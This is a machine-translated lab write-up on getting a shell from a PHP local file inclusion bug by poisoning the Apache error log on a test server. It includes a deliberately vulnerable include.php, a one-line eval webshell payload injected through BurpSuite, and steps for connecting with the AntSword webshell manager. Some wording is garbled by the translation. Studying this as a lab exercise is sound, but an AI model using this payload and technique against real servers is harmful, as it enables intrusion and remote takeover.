1 Experiment introduction

The experimental requirements ： Suppose the attacker already knows that a website exists and only local File Inclusion Vulnerability exists , And there are no file upload vulnerability points and other vulnerabilities , how GetShell.
The experiment purpose ： Exploit local File Inclusion Vulnerability GetShell.

2 Experimental environment

（1） Drone aircraft

• This experiment is based on WAMP Environment to test , Environment deployment process reference article 《【 Language environment 】WAMP Environment deployment and optimization — With win2008R2SP1 For the operating system 》,IP by 172.16.1.1.

• Check out the target PHP edition . You need to view the of the built server PHP edition , Next, modify its configuration .

• open phpstudy Installation folder , find PHP-5.4.45 Version corresponding folder , Will file php.ini Medium allow_url_include Parameter set to On, Remember to save and restart the server after modification .
  

• Under the root directory of the environment website , New folder FileInclusion, stay FileInclusion Create the following files under the folder to experiment . Create a new one txt file , Enter the following code , And rename to include.php.

<?php
$path = $_GET['path'];
echo "<h1>This is include.php!</h1>";
include $path;
?>

（2） attack
Real machine installation BurpSuite And Chinese ant sword , Installation reference of relevant software 《【Burp Suite Tools -1】BurpSuite Introduction and detailed explanation of installation process 》、《【 Ant sword tool -01】 Website management tools of the Chinese ant sword installation process and application examples 》.

3 The experimental steps

3.1 Include log files getshell

Ideas ： There is no file upload point , And we also need a file in the local server to have a sentence Trojan horse code , At this time, we think of , Log file records the error reporting method , In the transaction log file “ write in ” In a word, Trojans , Then use the file contains to execute the one sentence Trojan horse in the log file . The specific steps are as follows ：

（1） Will visit include.php Page URL link http://172.16.1.1/FileInclusion/include.php Copy , stay BurpSuite Of repeater Right click in the module to select Paste URL as request With URL Form add request , Click Send , You can see that the response was successfully received , Just because it was not passed to path Variable , So the prompt goes wrong .

（2） In the request line , Change the file path change request to one sentence code <?php @eval($_REQUEST['cmd']);?>, Click Send , You can see the response error .

（3） The server reports an error in the request , A response record will be added to the error log . On the target plane we open Apache Error log for , Path is C:\phpStudy\PHPTutorial\Apache\logs\error.log, You can see that an error message has been added , And the code is not enclosed in quotation marks , Can be included in the file to execute unconditionally .

（4） Use Chinese ant sword to connect . Open the Chinese ant sword in the real machine → Add data → Fill in URL Address and connection password , among URL Address http://172.16.1.1/FileInclusion/include.php?path=C:\phpStudy\PHPTutorial\Apache\logs\error.log, The password for cmd, Click Add .



（5） Management server . After adding, you can see the newly added content in the main interface of the software , Double click to manage the server .

expand

（1） contain session file , cause session Let the cat out of the
（2）metinfo5.0.4 The file contains vulnerability code audit

4 summary

Ideas ： The first step is to use everything possible to make a Trojan horse in a local file of the server ; The second step is to let the code execute .
reflection ： If the error log is not in the default location , How to find it or whether there are other ways ？
reflection ： If the target has a Remote File Inclusion Vulnerability , Attacker on server 2 Write a one sentence Trojan horse file on the , Use the target remote file to include the file , Does not Get Drone aircraft Shell. Later, we should have a deeper understanding of the control principle of the Trojan horse , To determine why it cannot be achieved , It is tentatively believed that shell The code is on the server 2 Executed on .